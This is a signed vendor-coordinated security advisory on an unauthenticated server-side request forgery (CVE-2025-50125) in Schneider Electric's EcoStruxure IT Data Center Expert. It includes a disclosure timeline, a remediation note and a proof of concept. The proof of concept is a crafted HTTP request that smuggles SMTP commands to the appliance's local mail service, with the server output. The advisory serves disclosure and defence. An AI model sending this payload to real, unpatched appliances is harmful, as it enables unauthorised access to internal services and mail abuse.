-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2025-011: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Server-Side Request Forgery Title: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Server-Side Request Forgery Advisory ID: KL-001-2025-011 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-011.txt 1. Vulnerability Details Affected Vendor: Schneider Electric Affected Product: EcoStruxure IT Data Center Expert Affected Version: 8.3 and prior Platform: CentOS CWE Classification: CWE-918: Server-Side Request Forgery (SSRF) CVE ID: CVE-2025-50125 2. Vulnerability Description The Data Center Expert ("DCE") appliance insecurely forwards HTTP requests based on user-controlled values, enabling an unauthenticated user to coerce the web application into sending data to arbitrary locations, such as the SMTP service listening on localhost. 3. Technical Description When an HTTP request is sent to either the "/plugins" or "/capturelogs" endpoints, the request is forwarded based on the "Host" request header. Since the "Host" request header is not validated, a user may supply any host / port combination and send data to arbitrary locations and view the response, creating a server-side request forgery vulnerability. GET /plugins HTTP/1.1 Host: example.com HTTP/1.1 404 Not Found ... Example Domain ... The upstream path is not controllable and HTTP redirects are not followed. Rather than issuing constrained HTTP requests, it is possible to instead send malicious data to other services that leverage protocols similar to HTTP, such as the SMTP service listening on the appliance's loopback address. Attempts to send well-formed HTTP requests to the SMTP service result in the TCP connection being prematurely severed, as common HTTP verbs are a sign of malicious activity. However, the proxy mechanism employed by the DCE appliance does not validate the verb, allowing malformed requests that contain valid SMTP commands such as "EHLO" and "MAIL FROM". When unexpected data is received, such as the "Host" and "X-Forwarded-For" request header, a benign error is returned without severing the TCP connection, allowing for additional (and well-formed) SMTP commands to follow. 4. Mitigation and Remediation Recommendation Version 9.0 of EcoStruxure IT Data Center Expert includes fixes for these vulnerabilities and is available upon request from Schneider Electric's Customer Care Center. Refer to https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf. 5. Credit This vulnerability was discovered by Jaggar Henry and Jim Becher of KoreLogic, Inc. 6. Disclosure Timeline 2024-11-21 : KoreLogic reports vulnerability details to Schneider Electric CPCERT. 2024-11-22 : Vendor acknowledges receipt of KoreLogic's submission. 2024-12-06 : Vendor confirms the reported vulnerability. 2024-12-12 : Vendor requests a meeting with KoreLogic to discuss the timeline of remediation efforts for this vulnerability, as well as for associated submissions from KoreLogic. 2024-12-18 : KoreLogic and Schneider Electric agree to embargo vulnerability details until product update 9.0, circa July, 2025. 2025-01-29 : Vendor provides status update. 2025-03-17 : Vendor provides beta release containing remediation for this and other associated vulnerabilities reported by KoreLogic. 2025-06-20 : Vendor notifies KoreLogic that the publication date for this vulnerability will be 2025-07-08. 2025-07-08 : Vendor public disclosure. 2025-07-09 : KoreLogic public disclosure. 7. Proof of Concept This behavior allows unauthenticated attackers to interact with services not usually exposed to the internet, such as the appliance's SMTP service, to further exploit and enumerate the system. The following is an HTTP request sent to the DCE web interface listening on TCP/80: EHLO /plugins?%0a%0dfoobar HTTP/1.1 Host: 127.0.0.1:25 Content-Length: 137 HELO localhost MAIL FROM: RCPT TO: DATA Subject: foobar This is a test email body . QUIT As shown in the HTTP response, request headers that do not represent valid SMTP commands are disregarded, allowing the body to be parsed as a valid message: HTTP/1.1 200 OK ... 220 dce.example.com ESMTP Sendmail 8.14.4/8.14.4; Mon, 1 Jul 2024 07:00:08 -0400501 5.0.0 Invalid domain name 500 5.5.1 Command unrecognized: "Host: 127.0.0.1:25" 500 5.5.1 Command unrecognized: "X-Forwarded-For: 192.168.2.65" 500 5.5.1 Command unrecognized: "X-Forwarded-Host: 127.0.0.1:25" 500 5.5.1 Command unrecognized: "X-Forwarded-Server: dce.example.com" 500 5.5.1 Command unrecognized: "Connection: Keep-Alive" 500 5.5.1 Command unrecognized: "Content-Length: 141" 500 5.5.1 Command unrecognized: "" 250 dce.example.com Hello localhost.localdomain [127.0.0.1], pleased to meet you 250 2.1.0 ... Sender ok 250 2.1.5 ... Recipient ok 354 Enter mail, end with "." on a line by itself 250 2.0.0 461B08WP030169 Message accepted for delivery 221 2.0.0 dce.example.com closing connection The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy -----BEGIN PGP SIGNATURE----- iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmhur7IaHGRpc2Nsb3N1 cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkel/Kw//Wcem9CqR13hgmKsoLKVR WIe88+wiOYrCOoPWGsyOY7mil7YkQXJuNYKBc7/mmJJfs6+D/JW2qrIQzqiuX13z PCCF17YxQtTftgEh/mlqq1BOppC+0eixQrThr3KPgs5XO3S7p9RsiB9DxHeTJ3+1 /Nf6Tari4feMIzJ+H8kFgPxeTLvIm7zwIMLtjSMg62Jzx5ksukH4uvJnNaZVHNS9 8e+qWpJz3OeDKhMj7Byht8P3ryGpQaHY0P5inPaZIhdbTZaS1g5NIYGkl9QNvDxw ZPtNwakknGUZlPib0HmWGtM2uNqgv6GUhLocfU1MmWYErPndkz1Ps4R2LuD8a9uU baYPouKDIU2CkbKDGA/F1JimsadBp78md5CjbMirQX2u7YV+6uDzDTo4gPons9FF X7UDNGVFd7WjFhC4IHzayC1OAm1fHXt8fLe5iqngqIJS/nPFImlxUxer0gbXEK4h VU6IvJMVNYoQmLFbJN8GVxSgvlS1ksqhi7RCGkPhI953r0mkjd4CMBRiLdxal8N8 uc06tn9hBhuXI9+o3caDT3qjJ968ioJnSyFDbUX41oSOhsOveaREYsC5NivnWJFD 1sc/6wwBTu9G4snbfdIinVCnWtSjwfWfwFdzZtDqVqNc9OMkJ+mGTmnrufvGjvZP KmhK0zNRxnES1Jz6pyPQh0M= =VEKE -----END PGP SIGNATURE-----